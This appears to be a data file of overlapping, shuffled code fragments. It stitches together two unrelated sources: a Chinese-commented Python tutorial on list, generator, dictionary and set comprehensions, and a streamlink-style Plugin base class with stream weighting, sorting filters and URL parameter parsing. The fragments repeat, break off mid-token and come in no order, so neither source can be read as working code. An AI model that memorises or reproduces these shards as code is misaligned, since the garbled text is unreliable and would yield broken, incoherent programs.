2 == 1]", "for item in odd_gen: print(item) # 字典推导式 my_dict = {\"bobby1\":", "23, \"imooc.com\": 5} reversed_dict = {value:key for key, value in", "value in my_dict.items()} print(reversed_dict) # 集合推导式 my_set = set(my_dict.keys()) my_set", "item in odd_gen: print(item) # 字典推导式 my_dict = {\"bobby1\": 22,", "\"imooc.com\": 5} reversed_dict = {value:key for key, value in my_dict.items()}", "i in range(21): # if i % 2 == 1:", "2. 逻辑复杂的情况 如果是奇数将结果平方 # 列表生成式性能高于列表操作 def handle_item(item): return item *", "reversed_dict = {value:key for key, value in my_dict.items()} print(reversed_dict) #", "i in range(21) if i % 2 == 1) print(type(odd_gen))", "odd_list = [i for i in range(21) if i %", "print(type(odd_gen)) for item in odd_gen: print(item) # 字典推导式 my_dict =", "range(21) if i % 2 == 1) print(type(odd_gen)) for item", "= [i for i in range(21) if i % 2", "in range(21): # if i % 2 == 1: #", "# 生成器表达式 odd_gen = (i for i in range(21) if", "key, value in my_dict.items()} print(reversed_dict) # 集合推导式 my_set = set(my_dict.keys())", "{value:key for key, value in my_dict.items()} print(reversed_dict) # 集合推导式 my_set", "print(reversed_dict) # 集合推导式 my_set = set(my_dict.keys()) my_set = {key for", "range(21) if i % 2 == 1] print(odd_list) # 生成器表达式", "# odd_list = [i for i in range(21) if i", "1. 提取出1-20之间的奇数 # odd_list = [] # for i in", "# for i in range(21): # if i % 2", "my_dict = {\"bobby1\": 22, \"bobby2\": 23, \"imooc.com\": 5} reversed_dict =", "逻辑复杂的情况 如果是奇数将结果平方 # 列表生成式性能高于列表操作 def handle_item(item): return item * item", "2 == 1] # print(odd_list) # 2. 逻辑复杂的情况 如果是奇数将结果平方 #", "for key, value in my_dict.items()} print(reversed_dict) # 集合推导式 my_set =", "i % 2 == 1] print(odd_list) # 生成器表达式 odd_gen =", "#!usr/bin/python # -*- coding:utf8 -*- # 列表生成式(列表推导式) # 1. 提取出1-20之间的奇数", "odd_list = [] # for i in range(21): # if", "handle_item(item): return item * item odd_list = [handle_item(i) for i", "% 2 == 1] print(odd_list) # 生成器表达式 odd_gen = (i", "# 集合推导式 my_set = set(my_dict.keys()) my_set = {key for key,", "odd_gen: print(item) # 字典推导式 my_dict = {\"bobby1\": 22, \"bobby2\": 23,", "== 1: # odd_list.append(i) # odd_list = [i for i", "in my_dict.items()} print(reversed_dict) # 集合推导式 my_set = set(my_dict.keys()) my_set =", "1) print(type(odd_gen)) for item in odd_gen: print(item) # 字典推导式 my_dict", "print(odd_list) # 生成器表达式 odd_gen = (i for i in range(21)", "5} reversed_dict = {value:key for key, value in my_dict.items()} print(reversed_dict)", "def handle_item(item): return item * item odd_list = [handle_item(i) for", "[i for i in range(21) if i % 2 ==", "= {value:key for key, value in my_dict.items()} print(reversed_dict) # 集合推导式", "2 == 1] print(odd_list) # 生成器表达式 odd_gen = (i for", "# 1. 提取出1-20之间的奇数 # odd_list = [] # for i", "print(item) # 字典推导式 my_dict = {\"bobby1\": 22, \"bobby2\": 23, \"imooc.com\":", "== 1] print(odd_list) # 生成器表达式 odd_gen = (i for i", "if i % 2 == 1) print(type(odd_gen)) for item in", "# -*- coding:utf8 -*- # 列表生成式(列表推导式) # 1. 提取出1-20之间的奇数 #", "% 2 == 1] # print(odd_list) # 2. 逻辑复杂的情况 如果是奇数将结果平方", "1] # print(odd_list) # 2. 逻辑复杂的情况 如果是奇数将结果平方 # 列表生成式性能高于列表操作 def", "return item * item odd_list = [handle_item(i) for i in", "in odd_gen: print(item) # 字典推导式 my_dict = {\"bobby1\": 22, \"bobby2\":", "coding:utf8 -*- # 列表生成式(列表推导式) # 1. 提取出1-20之间的奇数 # odd_list =", "(i for i in range(21) if i % 2 ==", "item odd_list = [handle_item(i) for i in range(21) if i", "if i % 2 == 1] print(odd_list) # 生成器表达式 odd_gen", "== 1) print(type(odd_gen)) for item in odd_gen: print(item) # 字典推导式", "[] # for i in range(21): # if i %", "# 列表生成式性能高于列表操作 def handle_item(item): return item * item odd_list =", "{\"bobby1\": 22, \"bobby2\": 23, \"imooc.com\": 5} reversed_dict = {value:key for", "22, \"bobby2\": 23, \"imooc.com\": 5} reversed_dict = {value:key for key,", "# 字典推导式 my_dict = {\"bobby1\": 22, \"bobby2\": 23, \"imooc.com\": 5}", "item * item odd_list = [handle_item(i) for i in range(21)", "for i in range(21) if i % 2 == 1)", "range(21) if i % 2 == 1] # print(odd_list) #", "列表生成式性能高于列表操作 def handle_item(item): return item * item odd_list = [handle_item(i)", "2 == 1: # odd_list.append(i) # odd_list = [i for", "-*- # 列表生成式(列表推导式) # 1. 提取出1-20之间的奇数 # odd_list = []", "if i % 2 == 1: # odd_list.append(i) # odd_list", "-*- coding:utf8 -*- # 列表生成式(列表推导式) # 1. 提取出1-20之间的奇数 # odd_list", "提取出1-20之间的奇数 # odd_list = [] # for i in range(21):", "2 == 1) print(type(odd_gen)) for item in odd_gen: print(item) #", "= [] # for i in range(21): # if i", "如果是奇数将结果平方 # 列表生成式性能高于列表操作 def handle_item(item): return item * item odd_list", "odd_list = [handle_item(i) for i in range(21) if i %" ]
[ "Plugin(object): \"\"\"A plugin can retrieve stream information from the URL", "url): self.url = url @classmethod def can_handle_url(cls, url): raise NotImplementedError", "op, value = match.group(\"op\", \"value\") op = FILTER_OPERATORS.get(op, operator.eq) filter_weight,", "version 1.9.0. Has been renamed to :func:`Plugin.streams`, this is an", "can_handle_url(cls, url): raise NotImplementedError @classmethod def set_option(cls, key, value): cls.options.set(key,", "backwards compatibility. \"\"\" return self.streams(*args, **kwargs) def _get_streams(self): raise NotImplementedError", "if stream in weights: return weights[stream], group match = re.match(r\"^(\\d+)(k|p)?(\\d+)?(\\+)?(?:_(\\d+)k)?(?:_(alt)(\\d)?)?$\",", "streams.keys()))) # We shouldn't need more than 2 alt streams", ":class:`Stream` object. The result can contain the synonyms **best** and", "streams with the same name are found, the order of", "knows math, please fix. BIT_RATE_WEIGHT_RATIO = 2.8 ALT_WEIGHT_MOD = 0.01", "expressions or a function that is passed to filter(). \"\"\"", "can be fine tuned with the *sorting_excludes* parameter. This can", "name = \"{0}{1}\".format(name, num_alts + 1) # Validate stream name", "match other stream types if \"*\" not in stream_types and", "= 20 LOW_PRIORITY = 10 NO_PRIORITY = 0 def stream_weight(stream):", "match = re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\", expr) if not match: raise PluginError(\"Invalid filter", "num_alts = len(list(filter(lambda n: n.startswith(name), streams.keys()))) # We shouldn't need", "session = None @classmethod def bind(cls, session, module): cls.cache =", "num_alts > 0: name = \"{0}{1}\".format(name, num_alts + 1) #", "import Cache from ..exceptions import PluginError, NoStreamsError from ..options import", "(name, stream) def stream_type_priority(stream_types, stream): stream_type = type(stream[1]).shortname() try: prio", "which streams to exclude from the best/worst synonyms. .. versionchanged::", "# bit rate classifier for resolution weight += int(match.group(5)) /", "= url.split(\" \", 1) url = split[0] params = split[1]", "by default it returns NORMAL priority. :return: priority level \"\"\"", "extract available streams. Returns a :class:`dict` containing the streams, where", "be a list of filter expressions or a function that", "We shouldn't need more than 2 alt streams if num_alts", "bitrate / BIT_RATE_WEIGHT_RATIO return weight, \"bitrate\" elif name_type == \"p\":", "not op(weight, filter_weight) return True return func def parse_url_params(url): split", "streams.keys()) sorted_streams = sorted(stream_names, key=stream_weight_only) if isinstance(sorting_excludes, list): for expr", "object. The result can contain the synonyms **best** and **worst**", "of a resolution. # Someone who knows math, please fix.", "stream_types and stream_type not in stream_types: continue # drop _alt", "sorting_excludes=None): \"\"\"Attempts to extract available streams. Returns a :class:`dict` containing", "or a function that is passed to filter(). \"\"\" try:", "the name while the rest will be renamed to \"<name>_<stream", "synonyms can be fine tuned with the *sorting_excludes* parameter. This", "# Create the best/worst synonmys def stream_weight_only(s): return (self.stream_weight(s)[0] or", "weight, group = stream_weight(quality) if group == filter_group: return not", "exclude from the best/worst synonyms. .. versionchanged:: 1.4.2 Added *priority*", "BIT_RATE_WEIGHT_RATIO return weight, \"pixels\" return 0, \"none\" def iterate_streams(streams): for", "FILTER_OPERATORS = { \"<\": operator.lt, \"<=\": operator.le, \">\": operator.gt, \">=\":", "= Options() session = None @classmethod def bind(cls, session, module):", "ValueError) as err: raise PluginError(err) if not ostreams: return {}", "list(ostreams) except NoStreamsError: return {} except (IOError, OSError, ValueError) as", "stream in streams: if isinstance(stream, list): for sub_stream in stream:", "\" \"changes to the service preventing a working implementation. \"", "types if \"*\" not in stream_types and stream_type not in", "This is likely due to \" \"changes to the service", "a function that is passed to filter(). \"\"\" try: ostreams", "to the service preventing a working implementation. \" ) if", "sorted(stream_names, key=stream_weight_only) if isinstance(sorting_excludes, list): for expr in sorting_excludes: filter_func", "rval = {} matches = re.findall(PARAMS_REGEX, params) for key, value", "HIGH_PRIORITY = 30 NORMAL_PRIORITY = 20 LOW_PRIORITY = 10 NO_PRIORITY", "def get_option(cls, key): return cls.options.get(key) @classmethod def stream_weight(cls, stream): return", "int(match.group(5)) / BIT_RATE_WEIGHT_RATIO return weight, \"pixels\" return 0, \"none\" def", "= split[1] if len(split) > 1 else '' return url,", "99 return prio def stream_sorting_filter(expr, stream_weight): match = re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\", expr)", "\"+\": weight += 1 if match.group(5): # bit rate classifier", "stream in weights: return weights[stream], group match = re.match(r\"^(\\d+)(k|p)?(\\d+)?(\\+)?(?:_(\\d+)k)?(?:_(alt)(\\d)?)?$\", stream)", "to be of highest and lowest quality respectively. If multiple", "a list of filter expressions or a function that is", "exclude streams ranked higher than \"480p\" from the list used", "making a bitrate's # weight end up similar to the", "LOW_PRIORITY = 10 NO_PRIORITY = 0 def stream_weight(stream): for group,", "stream types if \"*\" not in stream_types and stream_type not", "= re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\", expr) if not match: raise PluginError(\"Invalid filter expression:", "\"<name>_<stream type>\". The synonyms can be fine tuned with the", "weights in QUALITY_WEIGTHS_EXTRA.items(): if stream in weights: return weights[stream], group", "stream names as input. :param stream_types: A list of stream", "continue elif num_alts > 0: name = \"{0}{1}\".format(name, num_alts +", "except ValueError: prio = 99 return prio def stream_sorting_filter(expr, stream_weight):", "the plugin will operate on \"\"\" cache = None logger", "filter expressions or a function that is passed to filter().", "raise NotImplementedError @classmethod def set_option(cls, key, value): cls.options.set(key, value) @classmethod", "NotImplementedError @classmethod def set_option(cls, key, value): cls.options.set(key, value) @classmethod def", "= self._get_streams() if isinstance(ostreams, dict): ostreams = ostreams.items() # Flatten", "be either of these types: - A list of filter", "name in streams: name = \"{0}_alt\".format(name) num_alts = len(list(filter(lambda n:", "== filter_group: return not op(weight, filter_weight) return True return func", "if isinstance(sorting_excludes, list): for expr in sorting_excludes: filter_func = stream_sorting_filter(expr,", "\"{0}_{1}\".format(name, stream_type) if name in streams: name = \"{0}_alt\".format(name) num_alts", "= list(filter(sorting_excludes, sorted_streams)) final_sorted_streams = OrderedDict() for stream_name in sorted(streams,", "def parse_params(params): rval = {} matches = re.findall(PARAMS_REGEX, params) for", "can now be a list of filter expressions or a", "1.4.2 Added *priority* parameter. .. versionchanged:: 1.5.0 Renamed *priority* to", "= type(existing).shortname() if existing_stream_type != stream_type: name = \"{0}_{1}\".format(name, stream_type)", "= stream_types.index(\"*\") except ValueError: prio = 99 return prio def", "from ..options import Options # FIXME: This is a crude", "function that is passed to filter() with a list of", "shouldn't need more than 2 alt streams if num_alts >=", "\"hd\": 1080, \"sd\": 576, }, \"quality\": { \"ehq\": 720, \"hq\":", "# Validate stream name and discard the stream if it's", "\"<\": operator.lt, \"<=\": operator.le, \">\": operator.gt, \">=\": operator.ge, } PARAMS_REGEX", "has been ignored \" \"since it is badly named.\", name)", "1)) stream_names = filter(stream_weight_only, streams.keys()) sorted_streams = sorted(stream_names, key=stream_weight_only) if", "except Exception: pass rval[key] = value return rval class Plugin(object):", "OrderedDict() for stream_name in sorted(streams, key=stream_weight_only): final_sorted_streams[stream_name] = streams[stream_name] if", "name_type == \"k\": # bit rate bitrate = int(match.group(1)) weight", "_alt from any stream names if name.endswith(\"_alt\"): name = name[:-len(\"_alt\")]", "set_option(cls, key, value): cls.options.set(key, value) @classmethod def get_option(cls, key): return", "stream_sorting_filter(expr, stream_weight): match = re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\", expr) if not match: raise", "stream) if match: weight = 0 if match.group(6): if match.group(7):", "and 1)) stream_names = filter(stream_weight_only, streams.keys()) sorted_streams = sorted(stream_names, key=stream_weight_only)", "operator.ge, } PARAMS_REGEX = r\"(\\w+)=({.+?}|\\[.+?\\]|\\(.+?\\)|'(?:[^'\\\\]|\\\\')*'|\\\"(?:[^\\\"\\\\]|\\\\\\\")*\\\"|\\S+)\" HIGH_PRIORITY = 30 NORMAL_PRIORITY =", "r\"(\\w+)=({.+?}|\\[.+?\\]|\\(.+?\\)|'(?:[^'\\\\]|\\\\')*'|\\\"(?:[^\\\"\\\\]|\\\\\\\")*\\\"|\\S+)\" HIGH_PRIORITY = 30 NORMAL_PRIORITY = 20 LOW_PRIORITY = 10", "url): \"\"\" Return the plugin priority for a given URL,", "Options() session = None @classmethod def bind(cls, session, module): cls.cache", "= r\"(\\w+)=({.+?}|\\[.+?\\]|\\(.+?\\)|'(?:[^'\\\\]|\\\\')*'|\\\"(?:[^\\\"\\\\]|\\\\\\\")*\\\"|\\S+)\" HIGH_PRIORITY = 30 NORMAL_PRIORITY = 20 LOW_PRIORITY =", "stream_weight(stream) @classmethod def default_stream_types(cls, streams): stream_types = [\"rtmp\", \"hls\", \"hds\",", "due to \" \"changes to the service preventing a working", "a :class:`Stream` object. The result can contain the synonyms **best**", "to match other stream types if \"*\" not in stream_types", "ALT_WEIGHT_MOD name_type = match.group(2) if name_type == \"k\": # bit", "and priorities sorted_streams = sorted(iterate_streams(ostreams), key=partial(stream_type_priority, stream_types)) streams = {}", "multiple streams with the same name are found, the order", "= stream_types.index(stream_type) except ValueError: try: prio = stream_types.index(\"*\") except ValueError:", "\"sq\": 360, }, } FILTER_OPERATORS = { \"<\": operator.lt, \"<=\":", "= self.default_stream_types(ostreams) # Add streams depending on stream type and", "streams = {} for name, stream in sorted_streams: stream_type =", "functools import partial from ..cache import Cache from ..exceptions import", ":param url: URL that the plugin will operate on \"\"\"", "= ostreams.items() # Flatten the iterator to a list so", "equality will be tested. - A function that is passed", "__init__(self, url): self.url = url @classmethod def can_handle_url(cls, url): raise", "weight -= ALT_WEIGHT_MOD * int(match.group(7)) else: weight -= ALT_WEIGHT_MOD name_type", "return 0, \"none\" def iterate_streams(streams): for name, stream in streams:", "cls.logger = session.logger.new_module(\"plugin.\" + module) cls.module = module cls.session =", "a given URL, by default it returns NORMAL priority. :return:", "stream_types: A list of stream types to return. :param sorting_excludes:", "stream_type: name = \"{0}_{1}\".format(name, stream_type) if name in streams: name", "num_alts >= 2: continue elif num_alts > 0: name =", "will operate on \"\"\" cache = None logger = None", "PluginError, NoStreamsError from ..options import Options # FIXME: This is", "yield (name, sub_stream) else: yield (name, stream) def stream_type_priority(stream_types, stream):", "split[0] params = split[1] if len(split) > 1 else ''", "A list of stream types to return. :param sorting_excludes: Specify", "= sorted_streams[0] final_sorted_streams[\"worst\"] = streams[worst] final_sorted_streams[\"best\"] = streams[best] return final_sorted_streams", "for key, value in matches: try: value = ast.literal_eval(value) except", "\"bitrate\" elif name_type == \"p\": # resolution weight += int(match.group(1))", "Use * as wildcard to match other stream types if", "in the format *[operator]<value>*. For example the filter \">480p\" will", "which are likely to be of highest and lowest quality", "**kwargs): \"\"\"Deprecated since version 1.9.0. Has been renamed to :func:`Plugin.streams`,", "def get_streams(self, *args, **kwargs): \"\"\"Deprecated since version 1.9.0. Has been", "commonly the quality and the value is a :class:`Stream` object.", "the quality and the value is a :class:`Stream` object. The", "names if name.endswith(\"_alt\"): name = name[:-len(\"_alt\")] existing = streams.get(name) if", "cls.module = module cls.session = session def __init__(self, url): self.url", "of filter expressions in the format *[operator]<value>*. For example the", "or (len(streams) == 1 and 1)) stream_names = filter(stream_weight_only, streams.keys())", "decorator @classmethod def priority(cls, url): \"\"\" Return the plugin priority", "fix. BIT_RATE_WEIGHT_RATIO = 2.8 ALT_WEIGHT_MOD = 0.01 QUALITY_WEIGTHS_EXTRA = {", "streams, where the key is the name of the stream,", "if not match: raise PluginError(\"Invalid filter expression: {0}\".format(expr)) op, value", "and the value is a :class:`Stream` object. The result can", "input. :param stream_types: A list of stream types to return.", "in iterate_streams(streams): stream_type = type(stream).shortname() if stream_type not in stream_types:", "in the synonyms ranking. Valid operators are >, >=, <", "matches = re.findall(PARAMS_REGEX, params) for key, value in matches: try:", "broken. This is likely due to \" \"changes to the", "if stream_type not in stream_types: stream_types.append(stream_type) return stream_types @classmethod def", "gets to keep the name while the rest will be", "= {} for name, stream in sorted_streams: stream_type = type(stream).shortname()", "it is badly named.\", name) continue # Force lowercase name", "fine tuned with the *sorting_excludes* parameter. This can be either", "streams: name = \"{0}_alt\".format(name) num_alts = len(list(filter(lambda n: n.startswith(name), streams.keys())))", "weight += int(match.group(5)) / BIT_RATE_WEIGHT_RATIO return weight, \"pixels\" return 0,", "https://github.com/streamlink/streamlink/issues/{0}\".format(issue) raise PluginError(msg) def decorator(*args, **kwargs): return func return decorator", "= \"{0}_{1}\".format(name, stream_type) if name in streams: name = \"{0}_alt\".format(name)", "plugin priority for a given URL, by default it returns", "= sorted(iterate_streams(ostreams), key=partial(stream_type_priority, stream_types)) streams = {} for name, stream", "= Cache(filename=\"plugin-cache.json\", key_prefix=module) cls.logger = session.logger.new_module(\"plugin.\" + module) cls.module =", "badly named.\", name) continue # Force lowercase name and replace", "= 0 if match.group(6): if match.group(7): weight -= ALT_WEIGHT_MOD *", "@classmethod def broken(cls, issue=None): def func(*args, **kwargs): msg = (", "value is a :class:`Stream` object. The result can contain the", "the value is a :class:`Stream` object. The result can contain", "filter_weight) return True return func def parse_url_params(url): split = url.split(\"", "func(*args, **kwargs): msg = ( \"This plugin has been marked", "QUALITY_WEIGTHS_EXTRA = { \"other\": { \"live\": 1080, }, \"tv\": {", "sorted_streams = list(filter(filter_func, sorted_streams)) elif callable(sorting_excludes): sorted_streams = list(filter(sorting_excludes, sorted_streams))", "name = match.group(1) else: self.logger.debug(\"The stream '{0}' has been ignored", "{ \"hd\": 1080, \"sd\": 576, }, \"quality\": { \"ehq\": 720,", "from ..cache import Cache from ..exceptions import PluginError, NoStreamsError from", "== \"k\": # bit rate bitrate = int(match.group(1)) weight +=", "# fps eg. 60p or 50p weight += int(match.group(3)) if", "= None logger = None module = \"unknown\" options =", "filter() with a list of stream names as input. :param", "params = split[1] if len(split) > 1 else '' return", "return rval class Plugin(object): \"\"\"A plugin can retrieve stream information", "type>\". The synonyms can be fine tuned with the *sorting_excludes*", "operator.eq) filter_weight, filter_group = stream_weight(value) def func(quality): weight, group =", "is an alias for backwards compatibility. \"\"\" return self.streams(*args, **kwargs)", "stream, most commonly the quality and the value is a", "preventing a working implementation. \" ) if issue: msg +=", "and discard the stream if it's bad. match = re.match(\"([A-z0-9_+]+)\",", "stream_types.append(stream_type) return stream_types @classmethod def broken(cls, issue=None): def func(*args, **kwargs):", "ranked higher than \"480p\" from the list used in the", "\"{0}_alt\".format(name) num_alts = len(list(filter(lambda n: n.startswith(name), streams.keys()))) # We shouldn't", "Exception: pass rval[key] = value return rval class Plugin(object): \"\"\"A", "example the filter \">480p\" will exclude streams ranked higher than", "\"other\": { \"live\": 1080, }, \"tv\": { \"hd\": 1080, \"sd\":", "math, please fix. BIT_RATE_WEIGHT_RATIO = 2.8 ALT_WEIGHT_MOD = 0.01 QUALITY_WEIGTHS_EXTRA", "issue: msg += \"More info: https://github.com/streamlink/streamlink/issues/{0}\".format(issue) raise PluginError(msg) def decorator(*args,", "partial from ..cache import Cache from ..exceptions import PluginError, NoStreamsError", "= match.group(1) else: self.logger.debug(\"The stream '{0}' has been ignored \"", "please fix. BIT_RATE_WEIGHT_RATIO = 2.8 ALT_WEIGHT_MOD = 0.01 QUALITY_WEIGTHS_EXTRA =", "to \"<name>_<stream type>\". The synonyms can be fine tuned with", "of stream types to return. :param sorting_excludes: Specify which streams", "else '' return url, parse_params(params) def parse_params(params): rval = {}", "+= 1 if match.group(5): # bit rate classifier for resolution", "not ostreams: return {} if stream_types is None: stream_types =", "+= int(match.group(5)) / BIT_RATE_WEIGHT_RATIO return weight, \"pixels\" return 0, \"none\"", "PluginError(msg) def decorator(*args, **kwargs): return func return decorator @classmethod def", "operator is specified then equality will be tested. - A", "function that is passed to filter(). \"\"\" try: ostreams =", ".. versionchanged:: 1.5.0 Renamed *priority* to *stream_types* and changed behaviour", "alt streams if num_alts >= 2: continue elif num_alts >", "streams[best] return final_sorted_streams def get_streams(self, *args, **kwargs): \"\"\"Deprecated since version", "will be renamed to \"<name>_<stream type>\". The synonyms can be", "'' return url, parse_params(params) def parse_params(params): rval = {} matches", "implementation. \" ) if issue: msg += \"More info: https://github.com/streamlink/streamlink/issues/{0}\".format(issue)", "of these types: - A list of filter expressions in", "sorted(streams, key=stream_weight_only): final_sorted_streams[stream_name] = streams[stream_name] if len(sorted_streams) > 0: best", "as input. :param stream_types: A list of stream types to", "for backwards compatibility. \"\"\" return self.streams(*args, **kwargs) def _get_streams(self): raise", "{} except (IOError, OSError, ValueError) as err: raise PluginError(err) if", "sorted(iterate_streams(ostreams), key=partial(stream_type_priority, stream_types)) streams = {} for name, stream in", "int(match.group(3)) if match.group(4) == \"+\": weight += 1 if match.group(5):", "\"none\" def iterate_streams(streams): for name, stream in streams: if isinstance(stream,", "the format *[operator]<value>*. For example the filter \">480p\" will exclude", "= \"unknown\" options = Options() session = None @classmethod def", "stream_type) if name in streams: name = \"{0}_alt\".format(name) num_alts =", "more than 2 alt streams if num_alts >= 2: continue", "{ \"ehq\": 720, \"hq\": 576, \"sq\": 360, }, } FILTER_OPERATORS", "try: value = ast.literal_eval(value) except Exception: pass rval[key] = value", "priority(cls, url): \"\"\" Return the plugin priority for a given", "priorities sorted_streams = sorted(iterate_streams(ostreams), key=partial(stream_type_priority, stream_types)) streams = {} for", "url = split[0] params = split[1] if len(split) > 1", "stream_types = self.default_stream_types(ostreams) # Add streams depending on stream type", "num_alts + 1) # Validate stream name and discard the", "ostreams: ostreams = list(ostreams) except NoStreamsError: return {} except (IOError,", "match.group(1) else: self.logger.debug(\"The stream '{0}' has been ignored \" \"since", "in *stream_types* will determine which stream gets to keep the", "PARAMS_REGEX = r\"(\\w+)=({.+?}|\\[.+?\\]|\\(.+?\\)|'(?:[^'\\\\]|\\\\')*'|\\\"(?:[^\\\"\\\\]|\\\\\\\")*\\\"|\\S+)\" HIGH_PRIORITY = 30 NORMAL_PRIORITY = 20 LOW_PRIORITY", "be renamed to \"<name>_<stream type>\". The synonyms can be fine", "weight of a resolution. # Someone who knows math, please", "yield (name, stream) def stream_type_priority(stream_types, stream): stream_type = type(stream[1]).shortname() try:", "\"hls\", \"hds\", \"http\"] for name, stream in iterate_streams(streams): stream_type =", "bit rate bitrate = int(match.group(1)) weight += bitrate / BIT_RATE_WEIGHT_RATIO", "is a :class:`Stream` object. The result can contain the synonyms", "url, parse_params(params) def parse_params(params): rval = {} matches = re.findall(PARAMS_REGEX,", "versionchanged:: 1.6.0 *sorting_excludes* can now be a list of filter", "Returns a :class:`dict` containing the streams, where the key is", "it returns NORMAL priority. :return: priority level \"\"\" return NORMAL_PRIORITY", "is the name of the stream, most commonly the quality", "\"since it is badly named.\", name) continue # Force lowercase", "- A function that is passed to filter() with a", "from the URL specified. :param url: URL that the plugin", "the list used in the synonyms ranking. Valid operators are", "streams. Returns a :class:`dict` containing the streams, where the key", "@classmethod def get_option(cls, key): return cls.options.get(key) @classmethod def stream_weight(cls, stream):", "get_streams(self, *args, **kwargs): \"\"\"Deprecated since version 1.9.0. Has been renamed", "rate classifier for resolution weight += int(match.group(5)) / BIT_RATE_WEIGHT_RATIO return", "Options # FIXME: This is a crude attempt at making", "ValueError: prio = 99 return prio def stream_sorting_filter(expr, stream_weight): match", "filter expression: {0}\".format(expr)) op, value = match.group(\"op\", \"value\") op =", "\"\"\" return NORMAL_PRIORITY def streams(self, stream_types=None, sorting_excludes=None): \"\"\"Attempts to extract", "@classmethod def bind(cls, session, module): cls.cache = Cache(filename=\"plugin-cache.json\", key_prefix=module) cls.logger", "elif name_type == \"p\": # resolution weight += int(match.group(1)) if", "\"{0}{1}\".format(name, num_alts + 1) # Validate stream name and discard", "\"\"\" Return the plugin priority for a given URL, by", "streams which are likely to be of highest and lowest", "versionchanged:: 1.5.0 Added *sorting_excludes* parameter. .. versionchanged:: 1.6.0 *sorting_excludes* can", "key, value): cls.options.set(key, value) @classmethod def get_option(cls, key): return cls.options.get(key)", "return cls.options.get(key) @classmethod def stream_weight(cls, stream): return stream_weight(stream) @classmethod def", "else: yield (name, stream) def stream_type_priority(stream_types, stream): stream_type = type(stream[1]).shortname()", "key_prefix=module) cls.logger = session.logger.new_module(\"plugin.\" + module) cls.module = module cls.session", "name and discard the stream if it's bad. match =", "= ( \"This plugin has been marked as broken. This", "are likely to be of highest and lowest quality respectively.", "final_sorted_streams[\"best\"] = streams[best] return final_sorted_streams def get_streams(self, *args, **kwargs): \"\"\"Deprecated", "bitrate = int(match.group(1)) weight += bitrate / BIT_RATE_WEIGHT_RATIO return weight,", "weight += int(match.group(3)) if match.group(4) == \"+\": weight += 1", "stream_types: continue # drop _alt from any stream names if", "for stream_name in sorted(streams, key=stream_weight_only): final_sorted_streams[stream_name] = streams[stream_name] if len(sorted_streams)", "specified in *stream_types* will determine which stream gets to keep", "stream): stream_type = type(stream[1]).shortname() try: prio = stream_types.index(stream_type) except ValueError:", "and changed behaviour slightly. .. versionchanged:: 1.5.0 Added *sorting_excludes* parameter.", "to filter(). \"\"\" try: ostreams = self._get_streams() if isinstance(ostreams, dict):", "\", 1) url = split[0] params = split[1] if len(split)", "an alias for backwards compatibility. \"\"\" return self.streams(*args, **kwargs) def", "weight end up similar to the weight of a resolution.", "name_type == \"p\": # resolution weight += int(match.group(1)) if match.group(3):", "None: stream_types = self.default_stream_types(ostreams) # Add streams depending on stream", "list): for sub_stream in stream: yield (name, sub_stream) else: yield", "the service preventing a working implementation. \" ) if issue:", "than \"480p\" from the list used in the synonyms ranking.", "\"\"\"Deprecated since version 1.9.0. Has been renamed to :func:`Plugin.streams`, this", "stream_types @classmethod def broken(cls, issue=None): def func(*args, **kwargs): msg =", "from functools import partial from ..cache import Cache from ..exceptions", "passed to filter(). \"\"\" try: ostreams = self._get_streams() if isinstance(ostreams,", "if match.group(3): # fps eg. 60p or 50p weight +=", "ostreams = ostreams.items() # Flatten the iterator to a list", "as broken. This is likely due to \" \"changes to", "( \"This plugin has been marked as broken. This is", "which stream gets to keep the name while the rest", "from collections import OrderedDict from functools import partial from ..cache", "# Flatten the iterator to a list so we can", "else: weight -= ALT_WEIGHT_MOD name_type = match.group(2) if name_type ==", "def iterate_streams(streams): for name, stream in streams: if isinstance(stream, list):", "the synonyms ranking. Valid operators are >, >=, < and", "for expr in sorting_excludes: filter_func = stream_sorting_filter(expr, self.stream_weight) sorted_streams =", "for name, stream in streams: if isinstance(stream, list): for sub_stream", "be of highest and lowest quality respectively. If multiple streams", "expression: {0}\".format(expr)) op, value = match.group(\"op\", \"value\") op = FILTER_OPERATORS.get(op,", "is a crude attempt at making a bitrate's # weight", "operators are >, >=, < and <=. If no operator", "stream_type = type(stream).shortname() # Use * as wildcard to match", "split = url.split(\" \", 1) url = split[0] params =", "match = re.match(\"([A-z0-9_+]+)\", name) if match: name = match.group(1) else:", "= FILTER_OPERATORS.get(op, operator.eq) filter_weight, filter_group = stream_weight(value) def func(quality): weight,", "tested. - A function that is passed to filter() with", "list of filter expressions in the format *[operator]<value>*. For example", "\">=\": operator.ge, } PARAMS_REGEX = r\"(\\w+)=({.+?}|\\[.+?\\]|\\(.+?\\)|'(?:[^'\\\\]|\\\\')*'|\\\"(?:[^\\\"\\\\]|\\\\\\\")*\\\"|\\S+)\" HIGH_PRIORITY = 30 NORMAL_PRIORITY", "OSError, ValueError) as err: raise PluginError(err) if not ostreams: return", "ValueError: try: prio = stream_types.index(\"*\") except ValueError: prio = 99", "NORMAL_PRIORITY def streams(self, stream_types=None, sorting_excludes=None): \"\"\"Attempts to extract available streams.", "elif callable(sorting_excludes): sorted_streams = list(filter(sorting_excludes, sorted_streams)) final_sorted_streams = OrderedDict() for", "# Force lowercase name and replace space with underscore. streams[name.lower()]", "} PARAMS_REGEX = r\"(\\w+)=({.+?}|\\[.+?\\]|\\(.+?\\)|'(?:[^'\\\\]|\\\\')*'|\\\"(?:[^\\\"\\\\]|\\\\\\\")*\\\"|\\S+)\" HIGH_PRIORITY = 30 NORMAL_PRIORITY = 20", "as err: raise PluginError(err) if not ostreams: return {} if", "This can be either of these types: - A list", "lowest quality respectively. If multiple streams with the same name", "0: best = sorted_streams[-1] worst = sorted_streams[0] final_sorted_streams[\"worst\"] = streams[worst]", "order of streams specified in *stream_types* will determine which stream", "containing the streams, where the key is the name of", "}, \"quality\": { \"ehq\": 720, \"hq\": 576, \"sq\": 360, },", "streams if num_alts >= 2: continue elif num_alts > 0:", "up similar to the weight of a resolution. # Someone", "expr in sorting_excludes: filter_func = stream_sorting_filter(expr, self.stream_weight) sorted_streams = list(filter(filter_func,", "type(stream[1]).shortname() try: prio = stream_types.index(stream_type) except ValueError: try: prio =", "@classmethod def can_handle_url(cls, url): raise NotImplementedError @classmethod def set_option(cls, key,", "# Someone who knows math, please fix. BIT_RATE_WEIGHT_RATIO = 2.8", "0, \"none\" def iterate_streams(streams): for name, stream in 